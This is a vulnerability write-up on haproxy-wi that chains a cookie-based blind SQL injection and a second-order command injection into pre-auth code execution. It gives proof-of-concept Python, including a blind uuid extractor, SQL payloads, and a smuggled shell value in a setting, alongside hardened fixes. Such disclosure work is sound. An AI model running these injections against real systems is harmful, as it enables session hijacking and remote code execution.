I found haproxy-wi in the AWS/DigitalOcean marketplace when I was looking for a solution to manage multiple reverse proxies. Since it was open source I peeked at how it works and found some critical issues which, combined, lead to pre-auth RCE.
# SQL injections:
Inside /app/sql.py, several SQL statements have user-controlled input formatted directly into the query string instead of being passed as bound parameters.
## Unauthenticated SQLi
When an attacker requests any of the pages inside the /app folder, authentication is checked via funct.check_login(). check_login() takes the uuid cookie value and tries to update the expiration timestamp for that uuid with sql.update_last_act_user(user_uuid.value):
```python
def update_last_act_user(uuid):
    cursor = conn.cursor()
    session_ttl = get_setting('session_ttl')
    # uuid comes straight from the cookie and is %-formatted into the query
    if mysql_enable == '1':
        sql = """ update uuid set exp = now()+ INTERVAL %s day where uuid = '%s' """ % (session_ttl, uuid)
    else:
        sql = """ update uuid set exp = datetime('now', '+%s days') where uuid = '%s' """ % (session_ttl, uuid)
    try:
        cursor.execute(sql)
    except Exception as e:
        funct.out_error(e)
```
The uuid cookie value is interpolated directly into the query, so an unauthenticated attacker can perform a blind SQL injection (the UPDATE returns no data to the client, so extraction has to go through a side channel such as response timing or error behaviour) to dump the database or extract a valid uuid and bypass authentication.
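To make the bug concrete, here is an added example (not code from haproxy-wi or from the report) that reproduces the sqlite branch of update_last_act_user() against a constructed in-memory uuid table, recovers the stored uuid character by character through a boolean oracle, and shows the parameterised form that closes the hole. The table layout, the sample uuids and the SESSION_TTL value are assumptions; the oracle uses the UPDATE's rowcount as its yes/no signal, which stands in for the side channel (timing, error output) an attacker would have to use against the live application:

```python
import sqlite3

# Constructed stand-in for haproxy-wi's sqlite session table; the rows are
# sample data, not taken from a real install.
SESSION_TTL = "5"
VALID_UUID = "9c4d2e7a-1f0b-4c3d-8a6e-5b2f7d1e9a3c"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table uuid (user_id integer, uuid text, exp text)")
    conn.execute("insert into uuid values (1, ?, datetime('now', '+1 days'))", (VALID_UUID,))
    conn.execute("insert into uuid values (2, 'dead0000-0000-0000-0000-000000000000', datetime('now', '+1 days'))")
    conn.commit()
    return conn


def vulnerable_update(conn, cookie_uuid):
    # Same shape as update_last_act_user()'s sqlite branch: the cookie value is
    # %-formatted into the statement, so a quote in it changes the SQL.
    sql = """ update uuid set exp = datetime('now', '+%s days') where uuid = '%s' """ % (SESSION_TTL, cookie_uuid)
    cur = conn.execute(sql)
    return cur.rowcount


def safe_update(conn, cookie_uuid):
    # Hardened form: the ttl is cast to int and both values are bound
    # parameters, so the cookie is only ever compared as a string.
    modifier = "+%d days" % int(SESSION_TTL)
    cur = conn.execute("update uuid set exp = datetime('now', ?) where uuid = ?", (modifier, cookie_uuid))
    return cur.rowcount


def oracle(conn, condition):
    # Boolean oracle: did the injected WHERE clause match at least one row?
    # rowcount is the signal here; the real app never returns it, so an
    # attacker would substitute a timing delay or error-based side channel.
    payload = "x' OR (%s) -- " % condition
    return vulnerable_update(conn, payload) > 0


def extract_uuid(conn, max_len=36):
    # Blind, character-by-character recovery of the first session uuid using
    # nothing but the yes/no oracle above.
    alphabet = "0123456789abcdef-"
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = "(select substr(uuid,%d,1) from uuid order by user_id limit 1) = '%s'" % (pos, ch)
            if oracle(conn, cond):
                found += ch
                break
        else:
            break  # no character matched: end of the value
    return found


if __name__ == "__main__":
    db = new_db()
    print("rows hit by ' OR 1=1:", vulnerable_update(db, "x' OR 1=1 -- "))
    print("rows hit by same payload, parameterised:", safe_update(db, "x' OR 1=1 -- "))
    print("recovered uuid:", extract_uuid(db))
```

The recovered value is exactly what an attacker needs: presenting it as the uuid cookie makes check_login() treat the request as that user's session. The fix is not escaping but parameter binding, and the ttl must be validated as an integer too, since it is read from the settings table that an authenticated user can edit.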
## Authenticated SQLi
One example of authenticated SQLi is reached through the select_servers function:
```python
def select_servers(**kwargs):
    cursor = conn.cursor()
    sql = """select * from servers where enable = '1' ORDER BY groups """
    # every branch below %-formats a caller-supplied value into the query
    if kwargs.get("server") is not None:
        sql = """select * from servers where ip='%s' """ % kwargs.get("server")
    if kwargs.get("full") is not None:
        sql = """select * from servers ORDER BY hostname """
    if kwargs.get("get_master_servers") is not None:
        sql = """select id,hostname from servers where master = 0 and type_ip = 0 and enable = 1 ORDER BY groups """
    if kwargs.get("get_master_servers") is not None and kwargs.get('uuid') is not None:
        sql = """ select servers.id, servers.hostname from servers left join user as user on servers.groups = user.groups left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' and servers.master = 0 and servers.type_ip = 0 and servers.enable = 1 ORDER BY servers.groups """ % kwargs.get('uuid')
    if kwargs.get("id"):
        sql = """select * from servers where id='%s' """ % kwargs.get("id")
    if kwargs.get("hostname"):
        sql = """select * from servers where hostname='%s' """ % kwargs.get("hostname")
    if kwargs.get("id_hostname"):
        sql = """select * from servers where hostname='%s' or id = '%s' or ip = '%s'""" % (kwargs.get("id_hostname"), kwargs.get("id_hostname"), kwargs.get("id_hostname"))
    if kwargs.get("server") and kwargs.get("keep_alive"):
        sql = """select active from servers where ip='%s' """ % kwargs.get("server")
    try:
        cursor.execute(sql)
    except Exception as e:
        funct.out_error(e)
    else:
        return cursor.fetchall()
```
There are multiple injection points from user-supplied input here (server, uuid, id, hostname and id_hostname are all formatted into the query unescaped). One way to reach this function is from hapservers.py, and it can be exploited from a least-privilege account such as guest. Several other functions in sql.py supply user input to SQL queries in the same way.
# Command injection:
Inside /app/funct.py and /api/api_funct.py, some of the commands executed are built from user input. One of many examples is a second-order command injection through a setting: haproxy_sock_port is stored in the settings table, an authenticated user can change it from https://[%HOST%]/app/users.py#settings, and calling the options page then invokes the function that uses that value and executes an arbitrary system command.
Most of the commands in the various functions are prone to command injection, either directly from request parameters or second-order from settings that are stored in the database and user controlled.
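The second-order pattern above, as an added example that is not haproxy-wi's own code: a constructed settings table holds haproxy_sock_port, an authenticated user overwrites it with shell metacharacters, and a later socket query interpolates the stored value into a shell command. The page does not show the real command string, so the `printf ... | nc host port` shape used here is an assumption standing in for whatever funct.py runs; the point is the setting-to-shell path, not the exact command. The hardened form validates the stored value as a TCP port and executes an argv list without a shell:

```python
import sqlite3
import subprocess


def new_settings_db():
    # Constructed stand-in for the settings table; sample row, not a real install.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table settings (param text primary key, value text)")
    conn.execute("insert into settings values ('haproxy_sock_port', '1999')")
    conn.commit()
    return conn


def set_setting(conn, param, value):
    # What the settings page effectively does: persist whatever the
    # authenticated user submitted, with no validation of the value.
    conn.execute("update settings set value = ? where param = ?", (value, param))
    conn.commit()


def get_setting(conn, param):
    return conn.execute("select value from settings where param = ?", (param,)).fetchone()[0]


def vulnerable_sock_query(conn, host):
    # Hypothetical socket query (assumed shape, see lead-in): the stored port is
    # pasted into a command string that a shell then parses, so a value such as
    # "1; id" appends a second command.
    port = get_setting(conn, "haproxy_sock_port")
    cmd = "printf 'show info\\n' | nc -w 1 %s %s" % (host, port)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_port(value):
    # Hardened form, step 1: the setting must parse as a TCP port before it is
    # used anywhere. Anything else is rejected, not interpolated.
    try:
        port = int(value)
    except (TypeError, ValueError):
        raise ValueError("haproxy_sock_port is not an integer: %r" % (value,))
    if not 1 <= port <= 65535:
        raise ValueError("haproxy_sock_port out of range: %d" % port)
    return port


def safe_sock_query(conn, host):
    # Hardened form, step 2: argv list with shell=False, so no shell ever sees
    # the setting and metacharacters in it cannot become extra commands.
    port = validate_port(get_setting(conn, "haproxy_sock_port"))
    argv = ["nc", "-w", "1", host, str(port)]
    return subprocess.run(argv, input="show info\n", capture_output=True, text=True).stdout


if __name__ == "__main__":
    db = new_settings_db()
    # the "attacker" is any logged-in user who can reach the settings page
    set_setting(db, "haproxy_sock_port", "1; echo injected-marker")
    print(vulnerable_sock_query(db, "127.0.0.1"))
    try:
        safe_sock_query(db, "127.0.0.1")
    except ValueError as err:
        print("rejected:", err)
```

The same validate_port() check belongs at write time in the settings handler as well as at use time; validating only on save leaves any value already in the database, or written through another SQL injection, unchecked.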
# Conclusion
Combining the two: the unauthenticated SQLi is used to extract a valid uuid and bypass authentication, and the command injection then gives code execution, so an unauthenticated attacker can achieve pre-auth RCE.